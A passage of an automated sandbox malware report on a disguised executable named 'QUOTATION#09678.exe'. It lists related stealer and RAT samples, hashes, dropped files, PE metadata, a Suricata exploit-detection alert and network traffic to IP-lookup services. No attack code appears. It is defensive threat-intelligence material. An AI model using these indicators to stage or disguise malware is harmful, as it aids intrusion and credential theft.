                                              FfmnGBw0Y6.exeGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              aYLsj8zqvn.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ip-api.comMVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • 208.95.112.1
                                              MVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • 208.95.112.1
                                              PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              4hrQ9TIhLv.exeGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              FfmnGBw0Y6.exeGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              aYLsj8zqvn.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              api.ipify.orgPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                              • 172.67.74.152
                                              7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                              • 104.26.12.205
                                              Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                              • 104.26.12.205
                                              Ordine d'acquisto OI16014 e OI1601.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                              • 104.26.12.205
                                              SecuriteInfo.com.Win32.Malware-gen.1695.31617.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.13.205
                                              8RuktpEZ8Q.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              SecuriteInfo.com.Win64.CrypterX-gen.2448.5331.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 172.67.74.152
                                              SecuriteInfo.com.Win64.CrypterX-gen.23557.8276.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              UNIFIEDLAYER-AS-1USmpsl.elfGet hashmaliciousMiraiBrowse
                                              • 162.215.45.6
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 98.131.204.215
                                              nullnet_load.i486.elfGet hashmaliciousMiraiBrowse
                                              • 142.5.109.37
                                              A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                              • 162.240.81.18
                                              TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 50.87.144.157
                                              COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 50.87.144.157
                                              https://docsend.com/view/yvdhrcvq4c4p7xrdGet hashmaliciousHTMLPhisherBrowse
                                              • 192.185.25.60
                                              w9ap9yNeCb.exeGet hashmaliciousAgentTeslaBrowse
                                              • 192.185.13.234
                                              https://woobox.com/sf4hxrGet hashmaliciousHTMLPhisherBrowse
                                              • 50.116.86.34
                                              https://hotmail.cdisaomiguel.com.brGet hashmaliciousUnknownBrowse
                                              • 108.179.193.134
                                              TUT-ASUSMVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • 208.95.112.1
                                              MVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • 208.95.112.1
                                              PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              4hrQ9TIhLv.exeGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              FfmnGBw0Y6.exeGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              aYLsj8zqvn.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 188.114.97.3
                                              Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              DHL9407155789.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Advice-Ref[A22D4YdWsbE4].xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                              • 172.67.159.147
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 188.114.97.3
                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 188.114.97.3

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eFattura88674084.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152
                                              givingbestthignswithgreatheatcaptialthingstodo.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                              • 172.67.74.152
                                              Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 172.67.74.152
                                              Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 172.67.74.152
                                              Purchase order.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152
                                              Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 172.67.74.152
                                              EE85716273#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 172.67.74.152
                                              Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 172.67.74.152
                                              Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 172.67.74.152
                                              NTS_eTaxInvoice.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QUOTATION#09678._b7f45236532ada1ff685acd64dd43e177d7657_ab0f4f5a_06831e9c-b9ba-4286-ba94-15da75c0c876\Report.wer

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1607466470866992
                                              Encrypted:false
                                              SSDEEP:192:jbkYN+FLU50UnUlaWhs0yc8mIdzuiFiZ24lO8pBH:/7sFdUnUlaus0vIzuiFiY4lO8p
                                              MD5:DAC6D6E5F944C9CA9E8BE5727523E280
                                              SHA1:0F18375AB186010D0C1F03C5826668664C88D1D7
                                              SHA-256:9DCBF352612D25BBE4004BA16C8DC09CFB6367D5CD77896B6549F2FBCC0E3D2A
                                              SHA-512:502E374AC6F06F57EDFD62F4C4A6AD1AB6EE5E8F337E976BD06E5646C115273B4811442623D87A91368B0EF9724FDDE87B00F03303A988E387FF581F5CC86707
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.1.8.2.5.4.5.6.0.6.9.9.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.1.8.2.5.4.6.3.2.5.7.3.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.8.3.1.e.9.c.-.b.9.b.a.-.4.2.8.6.-.b.a.9.4.-.1.5.d.a.7.5.c.0.c.8.7.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.2.f.b.9.c.d.-.2.a.2.2.-.4.4.b.0.-.b.e.0.4.-.3.a.d.0.c.7.4.b.f.c.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.Q.U.O.T.A.T.I.O.N.#.0.9.6.7.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.w.r.q.w.s.a.r.w.q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.5.0.-.0.0.0.1.-.0.0.1.4.-.a.2.7.e.-.a.b.9.a.9.3.2.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.b.5.8.4.4.f.f.1.6.d.7.c.c.1.9.3.9.c.7.b.6.3.a.2.0.c.1.6.e.8.0.0.0.0.0.0.0.0.!.0.0.0.0.b.d.0.5.a.7.1.8.4.5.6.b.3.e.0.e.5.8.7.f.e.a.c.7.a.0.a.4.b.2.3.7.3.4.c.0.f.e.6.d.!.Q.U.O.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER116B.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8816
                                              Entropy (8bit):3.7145660801464437
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJCZKy6Y9PxaC5gmfv6Jltrpr189b/aKT+fwhVm:R6lXJ5y6Y1xaC5gmfviltk/aKqfwq
                                              MD5:4F73D9214635E3548928D5AA6A623A36
                                              SHA1:6F42EBF191D720BCDDE41FE0C331E5F09F49BF7A
                                              SHA-256:7022F1FB0A4636ECC7FE83173B52B4C8939CAF4D290546D5DF7384F94B1FD4E3
                                              SHA-512:FD7BEB7F567002C983E75C2BA30549623C72F21BF67D4AD3ADAA2F92FDE197AB86F65773BA288618DD2781EA3E39ED150074CACE18DF03EABA264FDB21495674
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.0.4.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER11CA.tmp.xml

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4788
                                              Entropy (8bit):4.549323632855704
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zszLJg771I9adWpW8VYVFYm8M4JhQLAFpfyq859Eo7+0f0NHd:uIjfzlI7hs7VnJhQke17+0f0NHd
                                              MD5:AD07BCEB9252439BBD1C81F4B2535A9E
                                              SHA1:DF51C73D0FFBB63E86A397A11D27A3603AF8F6F2
                                              SHA-256:C1D7CE9124DCFF4630F2B8C9B228C6B178914FED23483B0759F92A03485BBAF3
                                              SHA-512:05DD1EDCEE42CAF15B7051A13D039DA7E31B57D952FC27CBAA499E8149E58C702617A82E0C1213095CB84D8E38F6285A911FB412440338DAA1A786BA11A350B2
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="573091" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF85.tmp.dmp

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:Mini DuMP crash report, 16 streams, Mon Nov 4 08:29:05 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):468081
                                              Entropy (8bit):3.253177871890506
                                              Encrypted:false
                                              SSDEEP:3072:TBWWD13aA25n3+vq3dk41UQcS/I5eOPePBn1CCqzllCFzyz:TIWW3QqdkQ/LOQBXq
                                              MD5:EAECDDB61EF0DE476D3D5ADEC0652980
                                              SHA1:7613CA00C9C28B1005BB555496196D77EC3532F0
                                              SHA-256:6EDD1EB460DFCA848B6E8966B8B63B619A0534F37EC350E9B78EE01899C086E4
                                              SHA-512:B572E2729F2ED594792B8232DE62D12E8B7983D59E27865C8FCF086A0AC120C0C17CC9D57DED1B212A8982E85E2C603EE6EDFF86D3773B8D26B910D5F0A109ED
                                              Malicious:false
                                              Preview:MDMP..a..... ........(g............t.......................$...p%......0....%.......K..>...........l.......8...........T...........P8..!............B...........D..............................................................................eJ......HE......Lw......................T.......P....(g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:Nlllulbnolz:NllUc
                                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                              Malicious:false
                                              Preview:@...e................................................@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ammgx2j.24r.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2yw4jnr.qy2.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kv2jtvwm.0ov.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjseab1j.e44.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Windows\appcompat\Programs\Amcache.hve

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.465784529279408
                                              Encrypted:false
                                              SSDEEP:6144:YIXfpi67eLPU9skLmb0b4RWSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSbh:NXD94RWlLZMM6YFHy+h
                                              MD5:2EC80E80F882CC6BF9B960B158D88173
                                              SHA1:9C20D74C097681EF55E380A6CF62D050A4AA6CAC
                                              SHA-256:DD663FCA93AA9A121B495DA98995CB0ACD1DBB167DC7F0B92F995B4C03E7ABC1
                                              SHA-512:786AC11F53CE9C137DCC89F4534BD1289155CEECC303C404A5AFB8CD7C9FBFBACBD8F6B70C4881214C2EC8C3CFB6E356FF522A09C5965BC54A2B749532FD3405
                                              Malicious:false
                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.*...................................................................................................................................................................................................................................................................................................................................................=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.094479328043646
                                              TrID:
                                              • Win64 Executable Console Net Framework (206006/5) 48.58%
                                              • Win64 Executable Console (202006/5) 47.64%
                                              • Win64 Executable (generic) (12005/4) 2.83%
                                              • Generic Win/DOS Executable (2004/3) 0.47%
                                              • DOS Executable Generic (2002/1) 0.47%
                                              File name:QUOTATION#09678.exe
                                              File size:2'313'878 bytes
                                              MD5:b415558b19c70c201f8787e507d09b93
                                              SHA1:bd05a718456b3e0e587feac7a0a4b23734c0fe6d
                                              SHA256:00a3e3e129b127e288fb531581c3c580679423db15464585798d07465b03944d
                                              SHA512:c9649a68455b680c130b22ffbc091cd5fa4ea0287cce40380f477259ee2e6cafe71573ec33a53dc670350363e0cb57e00e2fd88c882065b2fe850e2c8e1a688c
                                              SSDEEP:12288:PUvalbeOsrF4OwVyZdSp/oSKEJgvsMPeohmlbz6gTd9IevVGFm1sM2v:PBlbcguE3eeNYgT7B2esMe
                                              TLSH:B1B5774A7C57AC13BC108663E5E576FE12FE1C4BBCF5924FCF69AE45822A5BE0022570
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...X.$g.........."...0.J$............... ....@...... ................................#...`................................

                                              File Icon

                                              Icon Hash:443ad8d4dc581348

                                              Static PE Info

                                              General

                                              Entrypoint:0x400000
                                              Entrypoint Section:
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6724F658 [Fri Nov 1 15:40:08 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:

                                              Entrypoint Preview

                                              Instruction
                                              dec ebp
                                              pop edx
                                              nop
                                              add byte ptr [ebx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x10ed6.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x244a0x26009143e272d0a05dc07c93e3606b5a22f6False0.5835731907894737data5.992231576187486IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x60000x10ed60x11000e73984eaa0464f84dd70e9349e5325afFalse0.06192555147058824data3.2001647843440497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x61440x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.05199337513308885
                                              RT_GROUP_ICON0x1696c0x14data1.15
                                              RT_VERSION0x169800x36cdata0.410958904109589
                                              RT_MANIFEST0x16cec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-04T09:29:22.239239+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449746TCP
                                              2024-11-04T09:30:00.097094+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449749TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 4, 2024 09:29:06.069510937 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.069555998 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.069622040 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.080750942 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.080766916 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.702867985 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.702933073 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.706264973 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.706273079 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.706549883 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.756705999 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.775237083 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.815335035 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.948879957 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.948947906 CET44349730172.67.74.152192.168.2.4
                                              Nov 4, 2024 09:29:06.949042082 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.954989910 CET49730443192.168.2.4172.67.74.152
                                              Nov 4, 2024 09:29:06.969850063 CET4973280192.168.2.4208.95.112.1
                                              Nov 4, 2024 09:29:06.974797964 CET8049732208.95.112.1192.168.2.4
                                              Nov 4, 2024 09:29:06.974860907 CET4973280192.168.2.4208.95.112.1
                                              Nov 4, 2024 09:29:06.974951029 CET4973280192.168.2.4208.95.112.1
                                              Nov 4, 2024 09:29:06.979809999 CET8049732208.95.112.1192.168.2.4
                                              Nov 4, 2024 09:29:07.568665981 CET8049732208.95.112.1192.168.2.4
                                              Nov 4, 2024 09:29:07.616034031 CET4973280192.168.2.4208.95.112.1
                                              Nov 4, 2024 09:29:08.668884993 CET4973280192.168.2.4208.95.112.1
                                              Nov 4, 2024 09:29:08.674462080 CET8049732208.95.112.1192.168.2.4
                                              Nov 4, 2024 09:29:08.674537897 CET4973280192.168.2.4208.95.112.1
